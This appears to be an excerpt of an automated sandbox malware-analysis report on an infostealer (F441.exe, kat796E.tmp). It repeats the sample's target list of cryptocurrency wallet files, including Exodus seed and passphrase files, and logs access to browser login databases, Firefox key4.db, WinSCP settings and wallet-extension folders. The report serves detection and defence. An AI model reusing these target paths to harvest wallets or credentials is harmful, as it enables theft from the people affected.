Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Opens network shares
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: \\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: \\config\Jump to behavior
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
